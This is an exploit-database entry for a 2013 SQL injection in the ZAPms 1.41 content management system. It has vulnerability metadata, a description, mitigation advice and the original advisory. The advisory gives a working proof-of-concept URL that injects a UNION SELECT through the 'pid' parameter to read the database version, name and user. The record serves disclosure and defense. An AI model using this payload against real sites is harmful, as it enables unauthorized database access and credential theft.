ZAPms - exploit.company

vendor:

ZAPms

by:

NoGe

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: ZAPms

Affected Version From: 1.41

Affected Version To: 1.41

Patch Exists: No

Related CWE: N/A

CPE: a:zapms:zapms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2013

ZAPms <= SQL Injection Vulnerability

ZAPms is a free open source web content management system, adapted to the needs of businesses on the Internet. An attacker can exploit a SQL injection vulnerability in the 'products' page of the ZAPms application by sending a specially crafted HTTP request containing malicious SQL code. This can allow the attacker to gain access to sensitive information stored in the database, such as usernames and passwords.

Mitigation:

Input validation should be used to prevent malicious SQL code from being executed. Additionally, the application should be configured to use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

=============================================================================================================


  [o] ZAPms <= SQL Injection Vulnerability

       Software : ZAPms
       Version  : 1.41
       Vendor   : http://www.zapms.de
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Desc     : ZAPms is free open source web content management system,
                  adapted to the needs of businesses on the Internet.
                  The ZAPms offers many features and modules as well as an expansion interface for maximum capabilities.


=============================================================================================================


  [o] Exploit

       http://localhost/[path]/products?pid=[SQLi]


=============================================================================================================


  [o] PoC

       http://server/products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product


=============================================================================================================


  [o] Greetz

       Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
       aJe kaka11 matthews wishnusakti inc0mp13te martfella
       pizzyroot Genex H312Y noname tukulesto }^-^{


=============================================================================================================


  [o] April 09 2013 - Papua, Indonesia